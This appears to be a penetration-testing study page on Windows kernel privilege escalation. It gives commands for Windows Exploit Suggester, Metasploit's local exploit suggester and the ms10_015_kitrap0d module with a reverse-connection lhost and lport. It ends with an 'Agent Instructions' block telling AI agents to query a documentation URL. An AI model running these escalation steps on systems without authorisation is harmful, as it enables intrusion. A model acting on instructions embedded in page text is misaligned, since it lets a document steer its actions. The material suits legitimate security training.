# Kernel Exploits ## Overview The **Kernel** is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the **Kernel (system/core)** we become the **Kernel >:)** #### Kernel Version Example ```powerquery OS Version: 6.1.7600 N/A Build 7600 ``` ## Kernel Exploits via Windows Exploit Suggester #### Pull [System Information ](/windows-privilege-escalation/initial-enumeration-manual/system-enumeration.md)from machine ``` systeminfo ``` #### Stick into a sysinfo.txt file then update and feed it to Windows Exploit Suggester ```bash python2.7 windows-exploit-suggester.py -u ``` ```abap python2.7 windows-exploit-suggester.py -i sysinfo.txt -d 2024-03-02-mssb.xls ``` Search for the exploits after receiving the results {% embed url="" %} {% embed url="" %} ## Kernel Exploits via Metasploit #### Inside of an existing meterpreter shell ```bash run post/multi/recon/local_exploit_suggester ``` #### Choose an exploit based on the ones listed ```bash background exploit/windows/local/ms10_015_kitrap0d set session 1 set lhost tun0 set lport 5555 (something different from last session) exploit ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pnpt.adot8.com/windows-privilege-escalation/kernel-exploits.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.